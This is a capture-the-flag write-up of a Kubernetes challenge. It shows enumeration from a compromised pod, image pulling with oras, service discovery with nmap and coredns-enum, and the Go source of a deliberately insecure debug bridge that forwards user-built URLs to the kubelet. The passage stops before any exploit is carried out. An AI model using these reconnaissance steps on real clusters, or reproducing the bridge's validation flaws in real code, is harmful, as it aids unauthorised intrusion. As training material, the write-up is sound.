Wiz Cloud Security Championship October 2025
Table of Contents
Introduction
Another Kubernetes challenge. Always good fun, nice challenge before my holiday :) However, of course I never found time to write this up before, so doing so now.
Game of Pods
Starting off, the challenge description is:
You've gained access to a pod in the staging environment.
To beat this challenge, you'll have to spread throughout the cluster and escalate privileges. Can you reach the flag?
Good luck!
Within the terminal:
Loading...
Spinning up cluster... done
Tip: if terminal size is off, run `resize` to correct.
The flag is in kube-system.
Good luck!
Let’s start with some basic enumeration then.
root@test:~# kubectl auth whoami
ATTRIBUTE VALUE
Username system:serviceaccount:staging:test-sa
UID 0de08852-8557-40b2-8c4c-fa6fa193027b
Groups [system:serviceaccounts system:serviceaccounts:staging system:authenticated]
Extra: authentication.kubernetes.io/credential-id [JTI=3a02977f-08d1-4059-b5ad-51cbdaa0a3f9]
Extra: authentication.kubernetes.io/node-name [noder]
Extra: authentication.kubernetes.io/node-uid [801f7b5d-2332-443a-9d44-a190d1c9334d]
Extra: authentication.kubernetes.io/pod-name [test]
Extra: authentication.kubernetes.io/pod-uid [4f0c0d93-f622-47ad-b040-3f784afcc7ac]
root@test:~# kubectl auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list watch]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
OK, so the main thing here is the ability to look at the pods within the current namespace (this should be staging based on our service account).
root@test:~# kubectl get pods
NAME READY STATUS RESTARTS AGE
test 1/1 Running 0 32d
A singular pod… it’s named test, same as our terminal… I wonder if this is the same.
root@test:~# kubectl get pod test -o yaml
apiVersion: v1
kind: Pod
metadata:
annotations:
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{},"name":"test","namespace":"staging"},"spec":{"containers":[{"image":"hustlehub.azurecr.io/test:latest","imagePullPolicy":"IfNotPresent","name":"test"}],"serviceAccountName":"test-sa"}}
creationTimestamp: "2025-10-26T19:59:00Z"
name: test
namespace: staging
resourceVersion: "407"
uid: 4f0c0d93-f622-47ad-b040-3f784afcc7ac
spec:
containers:
- image: hustlehub.azurecr.io/test:latest
imagePullPolicy: IfNotPresent
name: test
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-9r88v
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
nodeName: noder
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
serviceAccount: test-sa
serviceAccountName: test-sa
terminationGracePeriodSeconds: 30
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: kube-api-access-9r88v
projected:
defaultMode: 420
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
path: namespace
status:
conditions:
- lastProbeTime: null
lastTransitionTime: "2025-10-26T19:59:19Z"
status: "True"
type: PodReadyToStartContainers
- lastProbeTime: null
lastTransitionTime: "2025-10-26T19:59:00Z"
status: "True"
type: Initialized
- lastProbeTime: null
lastTransitionTime: "2025-10-26T19:59:19Z"
status: "True"
type: Ready
- lastProbeTime: null
lastTransitionTime: "2025-10-26T19:59:19Z"
status: "True"
type: ContainersReady
- lastProbeTime: null
lastTransitionTime: "2025-10-26T19:59:00Z"
status: "True"
type: PodScheduled
containerStatuses:
- containerID: containerd://e4602154b08dd6b551d516d835212f57404d78eed27f81f13290f804fb19f4a3
image: hustlehub.azurecr.io/test:latest
imageID: hustlehub.azurecr.io/test@sha256:6c49ed1562fc0394f3e50549895776c5cac96524b011b8c4a26dea211e9d4610
lastState: {}
name: test
ready: true
restartCount: 0
started: true
state:
running:
startedAt: "2025-10-26T19:59:19Z"
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-9r88v
readOnly: true
recursiveReadOnly: Disabled
hostIP: 172.30.0.2
hostIPs:
- ip: 172.30.0.2
phase: Running
podIP: 10.42.0.2
podIPs:
- ip: 10.42.0.2
qosClass: BestEffort
startTime: "2025-10-26T19:59:00Z"
Considering all the details, such as same namespace, same pod name, same service account name, etc, I think this is the same pod as the one we are on. Maybe we need to enumerate more about this pod? Maybe there is something in the filesystem, we could just enumerate that… or we could try pulling the image and look at how it was built as that might be quicker.
Checking if there are any registry tools installed in the container, we do have oras which is a client for OCI images.
Let’s see what images are available in the registry.
root@test:/# oras repo ls hustlehub.azurecr.io
k8s-debug-bridge
test
OK. So there is the test image that we are using, but also a k8s-debug-bridge. Let’s quickly check test first before moving on, I have a hunch though the k8s-debug-bridge is the thing we need to actually play with.
root@test:/# oras repo tags hustlehub.azurecr.io/test
latest
root@test:~# mkdir test
root@test:~# oras copy hustlehub.azurecr.io/test:latest --to-oci-layout test
��� Copied application/vnd.in-toto+json 1.11/1.11 KB 100.00% 468��s
������ sha256:70677afa5d2823b1581158f4c3b1fb060afdc71829dfdaf7545fc1c7cb0cd1f6
��� Copied application/vnd.oci.image.config.v1+json 2.79/2.79 KB 100.00% 344��s
������ sha256:eacddf11be2eac3aab631212b981679513e2ad7c3026a47dcf36881dafed3e39
��� Copied application/vnd.oci.image.config.v1+json 167/167 B 100.00% 17��s
������ sha256:90b0a22ef30fe6fc89f36301285bb44625e67997a2dfeb5a85a6531973c65c44
��� Copied application/vnd.oci.image.layer.v1.tar+gzip 3.26/3.26 MB 100.00% 2s
����� sha256:44cf07d57ee4424189f012074a59110ee2065adfdde9c7d9826bebdffce0a885
�� Copied application/vnd.oci.image.layer.v1.tar+gzip 3.62/3.62 MB 100.00% 2s
������ sha256:218e134d5c22a9dd4e8203cb8ce718f76f4a25b016b8c5017f3d59a1ddc33f17
��� Copied application/vnd.oci.image.layer.v1.tar+gzip 37.6/37.6 MB 100.00% 10s
������ sha256:160842b5a7fbfea2b2d19e155e2ac5b7a2ea3686b38134f92bfab13c49eed602
��� Copied application/vnd.oci.image.manifest.v1+json 566/566 B 100.00% 205��s
������ sha256:9496f2d4fe66165397c57b03d98bb237e5dcde53b29bcf83bd62f782523562d2
��� Copied application/vnd.oci.image.layer.v1.tar+gzip 236/236 B 100.00% 231��s
������ sha256:4d249df000ffd8a30ca7358848d9bb270f8a7fb68846bb9b23d9aeeec7f8dc3e
��� Copied application/vnd.oci.image.layer.v1.tar+gzip 32/32 B 100.00% 12��s
������ sha256:4f4fb700ef54461cfa02571ae0db9a0dc1e0cdb5577484a6d75e68dc38e8acc1
��� Copied application/vnd.oci.image.manifest.v1+json 1.21/1.21 KB 100.00% 8ms
������ sha256:289d14a5688ca97bd4748119d364d14cbe7d4d94d0a09b07abeaebd0a8665220
��� Copied application/vnd.oci.image.index.v1+json 856/856 B 100.00% 284µs
������ sha256:6c49ed1562fc0394f3e50549895776c5cac96524b011b8c4a26dea211e9d4610
Copied [registry] hustlehub.azurecr.io/test:latest => [oci-layout] test
Digest: sha256:6c49ed1562fc0394f3e50549895776c5cac96524b011b8c4a26dea211e9d4610
From the oras output, we can see which are the image configs, and view them.
root@test:~/test/blobs/sha256# cat eacddf11be2eac3aab631212b981679513e2ad7c3026a47dcf36881dafed3e39 | jq
{
"architecture": "amd64",
"config": {
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"TERM=xterm-256color",
"PS1=\\[\\e]0;\\u@\\h: \\w\\a\\]\\[\\e[1;32m\\]\\u@\\h\\[\\e[0m\\]:\\[\\e[1;34m\\]\\w\\[\\e[0m\\]\\$ "
],
"Cmd": [
"sh",
"-c",
"sleep infinity"
],
"WorkingDir": "/root",
"ArgsEscaped": true
},
"created": "2025-10-22T19:59:52.238381172Z",
"history": [
{
"created": "2025-02-14T03:03:06Z",
"created_by": "ADD alpine-minirootfs-3.18.12-x86_64.tar.gz / # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2025-02-14T03:03:06Z",
"created_by": "CMD [\"/bin/sh\"]",
"comment": "buildkit.dockerfile.v0",
"empty_layer": true
},
{
"created": "2025-10-22T19:59:44.461503585Z",
"created_by": "COPY --chown=root:root --chmod=755 coredns-enum /usr/bin/coredns-enum # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2025-10-22T19:59:52.217281797Z",
"created_by": "RUN /bin/sh -c apk add --no-cache curl jq bash iproute2 bind-tools nmap wget && rm -rf /var/cache/apk/* && curl -LO \"https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl\" && install -o root -g root -m 0755 kubectl /usr/bin/kubectl && rm kubectl && ORAS_VERSION=\"1.3.0\" && curl -LO \"https://github.com/oras-project/oras/releases/download/v${ORAS_VERSION}/oras_${ORAS_VERSION}_linux_amd64.tar.gz\" && tar -xzf oras_${ORAS_VERSION}_linux_amd64.tar.gz oras && chown root:0 oras && mv oras /usr/bin/oras && rm -f oras_${ORAS_VERSION}_linux_amd64.tar.gz && touch -t 202508081200 /usr/bin/coredns-enum /usr/bin/kubectl /usr/bin/oras && rm -rf /root/.cache # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2025-10-22T19:59:52.229396256Z",
"created_by": "COPY --chown=root:root bashrc /root/.bashrc # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2025-10-22T19:59:52.238381172Z",
"created_by": "ENV TERM=xterm-256color PS1=\\[\\e]0;\\u@\\h: \\w\\a\\]\\[\\e[1;32m\\]\\u@\\h\\[\\e[0m\\]:\\[\\e[1;34m\\]\\w\\[\\e[0m\\]\\$ ",
"comment": "buildkit.dockerfile.v0",
"empty_layer": true
},
{
"created": "2025-10-22T19:59:52.238381172Z",
"created_by": "WORKDIR /root",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2025-10-22T19:59:52.238381172Z",
"created_by": "CMD [\"sh\" \"-c\" \"sleep infinity\"]",
"comment": "buildkit.dockerfile.v0",
"empty_layer": true
}
],
"os": "linux",
"rootfs": {
"type": "layers",
"diff_ids": [
"sha256:f44f286046d9443b2aeb895c0e1f4e688698247427bca4d15112c8e3432a803e",
"sha256:bbd5df938c0dfc873e9f8bd7f70395fb260685c0492af3b2cae0fa1a7fc02b2d",
"sha256:fd306fa8fee7ddc737cad5fceba35895b0b1875836c4b1181f952e6ca6f43046",
"sha256:14c22531dce13efcd8dcfbb00beae124c1d4406716620577a65a23cf5895cb25",
"sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef"
]
}
}
So they give us coredns-enum (I think I missed this in my original run, and had downloaded it into the container xD), nmap, other miscellaneous networking tools, and oras. But otherwise nothing much in here.
OK, let’s look at the k8s-debug-bridge.
root@test:~# oras repo tags hustlehub.azurecr.io/k8s-debug-bridge
latest
root@test:~# oras copy hustlehub.azurecr.io/k8s-debug-bridge:latest --to-oci-layout k8s-debug-bridge/
��� Copied application/vnd.oci.image.config.v1+json 167/167 B 100.00% 296 ������ sha256:3dc1aacf9e7b7aa152fe92304c74cc2822539cb27e25fe99282b221746d2636a ��� Copied application/vnd.in-toto+json 1.28/1.28 KB 100.00% 67 ������ sha256:b65292a38d914152cbd37c828a36b81cd3da1acfd0edaa77bf322332c41bd024 ��� Copied application/vnd.oci.image.config.v1+json 1.86/1.86 KB 100.00% 158 ������ sha256:7162697db986f5e02d9091e5f29193a473f5fbd2d7b186243813052c9b7b5ed7 ��� Copied application/vnd.oci.image.manifest.v1+json 566/566 B 100.00% 6 ������ sha256:65d8defc58f5d756d55f44a42c1d19ac3b4ea1944ec8f21cfcef70beba9a44db ��� Copied application/vnd.oci.image.layer.v1.tar+gzip 289/289 KB 100.00% 490 ������ sha256:049d988b9bf0a21ad8597ad57e538949be03f703977d21d9d30b7da3fc92f983 ��� Copied application/vnd.oci.image.layer.v1.tar+gzip 3.26/3.26 MB 100.00% ������ sha256:44cf07d57ee4424189f012074a59110ee2065adfdde9c7d9826bebdffce0a885 ��� Copied application/vnd.oci.image.layer.v1.tar+gzip 32/32 B 100.00% 332 ������ sha256:4f4fb700ef54461cfa02571ae0db9a0dc1e0cdb5577484a6d75e68dc38e8acc1 ��� Copied application/vnd.oci.image.layer.v1.tar+gzip 2.2/2.2 MB 100.00% ����� sha256:af22b6a1bf08e5477608575f8890ef7cbc61994011a54d37a5edd5630a6b9a6f ��� Copied application/vnd.oci.image.layer.v1.tar+gzip 1.84/1.84 KB 100.00% 7 ������ sha256:f055869862fb70dd5a7f7c2b9ac1e9d50b886d9a3b55c1e288ad1ba76644bdae ��� Copied application/vnd.oci.image.manifest.v1+json 1.21/1.21 KB 100.00% 9 ������ sha256:a705d5c6dd51fcfc0c8c7b8989df26b02a88740ae5b696fa8e65ac31f427b72e �� Copied application/vnd.oci.image.index.v1+json 856/856 B 100.00% 604� ������ sha256:0ed2d53c35dc594b40217506326e2f099dc8823fa5838a65736bfce6f1b0115f
Copied [registry] hustlehub.azurecr.io/k8s-debug-bridge:latest => [oci-layout] k8s-debug-bridge/
Digest: sha256:0ed2d53c35dc594b40217506326e2f099dc8823fa5838a65736bfce6f1b0115f
(That didn’t paste nicely… good luck…)… I ended up just installing file so I could make a quick bash one-liner to untar all the layers en-masse.
root@test:~/k8s-debug-bridge/blobs/sha256# file * | grep gzip | cut -d : -f 1 | xargs -n 1 tar zxvf
etc/
etc/apk/
etc/apk/protected_paths.d/
etc/apk/protected_paths.d/ca-certificates.list
etc/apk/world
etc/ca-certificates/
etc/ca-certificates/update.d/
[..SNIP..]
With all the files extracted, we can now browse the files. We can see some files within /root/.
root@test:~/k8s-debug-bridge/blobs/sha256# ls root/
TODO k8s-debug-bridge k8s-debug-bridge.go
This feels like a good place to investigate, let’s start with the TODO.
root@test:~/k8s-debug-bridge/blobs/sha256/root# cat TODO
- Remove source code from our images
- Achieve AGI
Well, the first one makes sense, considering we can see the .go source code. The AGI… sure… that would be good. Not much useful information here. Let’s dig into the source code.
// A simple debug bridge to offload debugging requests from the api server to the kubelet.
package main
import (
"crypto/tls"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"log"
"net"
"net/http"
"net/url"
"os"
"strings"
)
type Request struct {
NodeIP string `json:"node_ip"`
PodName string `json:"pod"`
PodNamespace string `json:"namespace,omitempty"`
ContainerName string `json:"container,omitempty"`
}
var (
httpClient = &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{
InsecureSkipVerify: true,
},
},
}
serviceAccountToken string
nodeSubnet string
)
func init() {
tokenBytes, err := ioutil.ReadFile("/var/run/secrets/kubernetes.io/serviceaccount/token")
if err != nil {
log.Fatalf("Failed to read service account token: %v", err)
}
serviceAccountToken = strings.TrimSpace(string(tokenBytes))
nodeIP := os.Getenv("NODE_IP")
if nodeIP == "" {
log.Fatal("NODE_IP environment variable is required")
}
nodeSubnet = nodeIP + "/24"
}
func main() {
http.HandleFunc("/logs", handleLogRequest)
http.HandleFunc("/checkpoint", handleCheckpointRequest)
fmt.Println("k8s-debug-bridge starting on :8080")
http.ListenAndServe(":8080", nil)
}
func handleLogRequest(w http.ResponseWriter, r *http.Request) {
handleRequest(w, r, "containerLogs", http.MethodGet)
}
func handleCheckpointRequest(w http.ResponseWriter, r *http.Request) {
handleRequest(w, r, "checkpoint", http.MethodPost)
}
func handleRequest(w http.ResponseWriter, r *http.Request, kubeletEndpoint string, method string) {
req, err := parseRequest(w, r) ; if err != nil {
return
}
targetUrl := fmt.Sprintf("https://%s:10250/%s/%s/%s/%s", req.NodeIP, kubeletEndpoint, req.PodNamespace, req.PodName, req.ContainerName)
if err := validateKubeletUrl(targetUrl); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
resp, err := queryKubelet(targetUrl, method) ; if err != nil {
http.Error(w, fmt.Sprintf("Failed to fetch %s: %v", method, err), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/octet-stream")
w.Write(resp)
}
func parseRequest(w http.ResponseWriter, r *http.Request) (*Request, error) {
if r.Method != http.MethodPost {
http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
return nil, fmt.Errorf("invalid method")
}
var req Request = Request{
PodNamespace: "app",
PodName: "app-blog",
ContainerName: "app-blog",
}
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
http.Error(w, "Invalid JSON", http.StatusBadRequest)
return nil, err
}
if req.NodeIP == "" {
http.Error(w, "node_ip is required", http.StatusBadRequest)
return nil, fmt.Errorf("missing required fields")
}
return &req, nil
}
func validateKubeletUrl(targetURL string) (error) {
parsedURL, err := url.Parse(targetURL) ; if err != nil {
return fmt.Errorf("failed to parse URL: %w", err)
}
// Validate target is an IP address
if net.ParseIP(parsedURL.Hostname()) == nil {
return fmt.Errorf("invalid node IP address: %s", parsedURL.Hostname())
}
// Validate IP address is in the nodes /16 subnet
if !isInNodeSubnet(parsedURL.Hostname()) {
return fmt.Errorf("target IP %s is not in the node subnet", parsedURL.Hostname())
}
// Prevent self-debugging
if strings.Contains(parsedURL.Path, "k8s-debug-bridge") {
return fmt.Errorf("cannot self-debug, received k8s-debug-bridge in parameters")
}
// Validate namespace is app
pathParts := strings.Split(strings.Trim(parsedURL.Path, "/"), "/")
if len(pathParts) < 3 {
return fmt.Errorf("invalid URL path format")
}
if pathParts[1] != "app" {
return fmt.Errorf("only access to the app namespace is allowed, got %s", pathParts[1])
}
return nil
}
func queryKubelet(url, method string) ([]byte, error) {
req, err := http.NewRequest(method, url, nil)
if err != nil {
return nil, fmt.Errorf("failed to create request: %w", err)
}
req.Header.Set("Authorization", "Bearer "+serviceAccountToken)
log.Printf("Making request to kubelet: %s", url)
resp, err := httpClient.Do(req)
if err != nil {
return nil, fmt.Errorf("failed to connect to kubelet: %w", err)
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
body, _ := io.ReadAll(resp.Body)
log.Printf("Kubelet error response: %d - %s", resp.StatusCode, string(body))
return nil, fmt.Errorf("kubelet returned status %d: %s", resp.StatusCode, string(body))
}
return io.ReadAll(resp.Body)
}
func isInNodeSubnet(targetIP string) bool {
target := net.ParseIP(targetIP)
if target == nil {
return false
}
_, subnet, err := net.ParseCIDR(nodeSubnet)
if err != nil {
return false
}
return subnet.Contains(target)
}
OK so analysing this code, we can observe a few things.
- This appears to listen on port 8080 (hardcoded), and exposes two endpoints -
/logsand/checkpoint - The requests to these must have a JSON payload containing
node_ip,pod,namespace(optional), andcontainer(optional) - It uses these parameters to make a request to the Kubelet port for that Node IP to hit the relevant Kubelet endpoint for logs or checkpoint
- There are a bunch of validations throughout the place, we might need to bypass these
- It auths to the Kubelet with its own service account
I assume this has been deployed in the cluster somewhere, guess we need to find it. First is always going via DNS, running it without arguments gives.
root@test:~/k8s-debug-bridge/blobs/sha256/root# coredns-enum
12:40PM INF Detected nameserver as 10.43.1.10:53
12:40PM INF Falling back to bruteforce mode
Error: problem getting apiserver cert
Guess we need to pass in a CIDR range to scan. We can get the service IP range by checking the IP of the API server within environment variables, we can just assume it’s a /16 CIDR range from there.
root@test:~/k8s-debug-bridge/blobs/sha256/root# env | grep -i service_host
KUBERNETES_SERVICE_HOST=10.43.1.1
root@test:~/k8s-debug-bridge/blobs/sha256/root# coredns-enum --cidr 10.43.1.1/16
12:43PM INF Detected nameserver as 10.43.1.10:53
12:43PM INF Falling back to bruteforce mode
12:43PM INF Scanning range 10.43.0.0 to 10.43.255.255, 65536 hosts
+-------------+------------------+-------------+--------------------+-----------+
| NAMESPACE | NAME | SVC IP | SVC PORT | ENDPOINTS |
+-------------+------------------+-------------+--------------------+-----------+
| app | app-blog-service | 10.43.1.36 | ?? | |
| | k8s-debug-bridge | 10.43.1.168 | ?? | |
| default | kubernetes | 10.43.1.1 | 443/tcp (https) | |
| kube-system | kube-dns | 10.43.1.10 | 53/tcp (dns-tcp) | |
| | | | 9153/tcp (metrics) | |
| | | | 53/udp (dns) | |
+-------------+------------------+-------------+--------------------+-----------+
Nice, we can see two services within the app namespace. That’s good, as the code has a check to make sure the namespace is set to app. We also have another service we can try looking into. I wonder if our service account has any permissions in that namespace.
root@test:~/k8s-debug-bridge/blobs/sha256/root# kubectl -n app auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Nope. Nevermind. I assume k8s-debug-bridge is listening on 8080. We can validate with an nmap scan.
root@test:~/k8s-debug-bridge/blobs/sha256/root# nmap 10.43.1.168 -p 8080
Starting Nmap 7.93 ( https://nmap.org ) at 2025-11-28 12:47 UTC
Nmap scan report for k8s-debug-bridge.app.svc.cluster.local (10.43.1.168)
Host is up (0.00074s latency).
PORT STATE SERVICE
8080/tcp filtered http-proxy
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Damn. Maybe not.
root@test:~/k8s-debug-bridge/blobs/sha256/root# nmap 10.43.1.168 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2025-11-28 12:48 UTC
Nmap scan report for k8s-debug-bridge.app.svc.cluster.local (10.43.1.168)
Host is up (0.000045s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 104.44 seconds
OK, it’s on port 80. The service must be remapping it. Let’s trying getting the logs of the app-blog-service. For that we need the node IP. We don’t know what node it is, but we can try guessing based of our own node IP. The code also seems to have some default values for pod / container name. We can try using those.
root@test:~/k8s-debug-bridge/blobs/sha256/root# kubectl get pods -o yaml | grep hostIP:
hostIP: 172.30.0.2
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/logs -d '{"node_ip": "172.30.0.2", "pod": "app-blog", "namespace": "app", "container":
"app-blog"}'
2025/10/26 19:59:15 Starting server on port 5000
Well.. that worked. Nice. Nothing useful in those logs. It is listening on port 5000, I wonder if there is something there?
root@test:~/k8s-debug-bridge/blobs/sha256/root# nmap -p- -T5 app-blog-service.app
Starting Nmap 7.93 ( https://nmap.org ) at 2025-11-28 12:54 UTC
Nmap scan report for app-blog-service.app (10.43.1.36)
Host is up (0.000044s latency).
rDNS record for 10.43.1.36: app-blog-service.app.svc.cluster.local
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 54.41 seconds
Let’s start investigating it with curl.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl app-blog-service.app
<a href="/login">See Other</a>.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl app-blog-service.app/login
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HustleHub - 10x Your Net Worth</title>
<link rel="stylesheet" href="/static/styles.css">
</head>
<body class="auth-page">
<div class="container">
<div class="card">
<h1>���� HustleHub</h1>
<p class="tagline">Passive income awaits. Your McLaren's not gonna buy itself.</p>
<h2>Login</h2>
<form method="POST" action="/login">
<div class="form-group">
<label for="username">Username</label>
<input type="text" id="username" name="username" required autofocus>
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" id="password" name="password" required>
</div>
<button type="submit" class="btn">Access Dashboard</button>
</form>
<p class="footer-link">Not grinding yet? <a href="/register">Register now</a></p>
</div>
</div>
</body>
</html>
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl app-blog-service.app/register
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HustleHub - 10x Your Net Worth</title>
<link rel="stylesheet" href="/static/styles.css">
</head>
<body class="auth-page">
<div class="container">
<div class="card">
<h1>���� HustleHub</h1>
<p class="tagline">Open 10 LLCs before lunch. Scale to 7 figures by dinner.</p>
<h2>Register for Alpha Access</h2>
<form method="POST" action="/register">
<div class="form-group">
<label for="username">Username</label>
<input type="text" id="username" name="username" required autofocus>
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" id="password" name="password" required>
</div>
<div class="form-group">
<label for="confirm">Confirm Password</label>
<input type="password" id="confirm" name="confirm" required>
</div>
<button type="submit" class="btn">Join the Grind</button>
</form>
<p class="footer-link">Already grinding? <a href="/login">Log in</a></p>
</div>
</div>
</body>
</html>
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl app-blog-service.app/register -X POST -d "username=skybound&password=testing&confirm=testing" -v
Note: Unnecessary use of -X or --request, POST is already inferred.
* Host app-blog-service.app:80 was resolved.
* IPv6: (none)
* IPv4: 10.43.1.36
* Trying 10.43.1.36:80...
* Connected to app-blog-service.app (10.43.1.36) port 80
* using HTTP/1.x
> POST /register HTTP/1.1
> Host: app-blog-service.app
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Length: 51
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 51 bytes
< HTTP/1.1 303 See Other
< Location: /login?ok=1
< X-Content-Type-Options: nosniff
< Date: Fri, 28 Nov 2025 12:57:43 GMT
< Content-Length: 0
<
* Connection #0 to host app-blog-service.app left intact
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl app-blog-service.app/login -d 'username=skybound&password=testing' -v
* Host app-blog-service.app:80 was resolved.
* IPv6: (none)
* IPv4: 10.43.1.36
* Trying 10.43.1.36:80...
* Connected to app-blog-service.app (10.43.1.36) port 80
* using HTTP/1.x
> POST /login HTTP/1.1
> Host: app-blog-service.app
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Length: 34
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 34 bytes
< HTTP/1.1 303 See Other
< Location: /
< Set-Cookie: hustlehub_session=MTc2NDMzNDY5OXxlc2dMYW8wdUNpUmtJYVJLcWtuZzdzd1ctWXNMYUY5c2psd2FBMUJvTHpxd3FwMXNKSHN6TjhubEJoVXhHZ1JiRjg1TWdnOEhwY2lNenRKNXRicXYwR3lJdkJncmNrbmpERUpybzZ4MHBZTi1aS21DfJQMbtRM3Edd9ytTYWfLH-fFyxJ9y2R3siQaAqw2jy7l; Path=/; Max-Age=86400; HttpOnly; Secure; SameSite=Lax
< X-Content-Type-Options: nosniff
< Date: Fri, 28 Nov 2025 12:58:19 GMT
< Content-Length: 0
<
* Connection #0 to host app-blog-service.app left intact
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl -H 'Cookie: hustlehub_session=MTc2NDMzNDY5OXxlc2dMYW8wdUNpUmtJYVJLcWtuZzdzd1ctWXNMYUY5c2psd2FBMUJvTHpxd3FwMXNKSHN6TjhubEJoVXhHZ1JiRjg1TWdnOEhwY2lNenRKNXRicXYwR3lJdkJncmNrbmpERUpybzZ4MHBZTi1aS21DfJQMbtRM3Edd9ytTYWfLH-fFyxJ9y2R3siQaAqw2jy7l' app-blog-service.app/
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HustleHub - 10x Your Net Worth</title>
<link rel="stylesheet" href="/static/styles.css">
</head>
<body>
<div class="container">
<div class="card">
<h1>���� HustleHub Dashboard</h1>
<p class="tagline">Welcome back, skybound. Time to 10x your empire.</p>
<div class="hero">
<h2>You're In.</h2>
<p>While others sleep, you grind. While they doubt, you scale. You didn't come here to be average.</p>
</div>
<div class="stats">
<div class="stat-card">
<div class="stat-number">10</div>
<div class="stat-label">LLCs Recommended</div>
</div>
<div class="stat-card">
<div class="stat-number">$80K</div>
<div class="stat-label">Monthly Passive (Projected)</div>
</div>
<div class="stat-card">
<div class="stat-number">3.2x</div>
<div class="stat-label">ROI This Quarter</div>
</div>
</div>
<div class="tips">
<h3>Pro Tips from the HustleHub Network</h3>
<ul>
<li>Generate passive aggressive income streams that work for you but aren't happy about it.</li>
<li>Wake up at 4 AM and open a Delaware LLC by noon. If you're not uncomfortable, you're not growing.</li>
<li>Money not coming in? You NEED MORE HUSTLE. Sign up for our limited course '10x Your Life' for just $2,999 using code 'GrindnosaurusRex'</li>
</ul>
</div>
<div class="actions">
<a href="/logout" class="btn-secondary">Logout</a>
</div>
</div>
</div>
</body>
</html>
Welp. That looks boring. Nothing immediate springs out to mind there. Back to the k8s-debug-bridge. After a while, I start thinking about how they generate the URL.
targetUrl := fmt.Sprintf("https://%s:10250/%s/%s/%s/%s", req.NodeIP, kubeletEndpoint, req.PodNamespace, req.PodName, req.ContainerName)
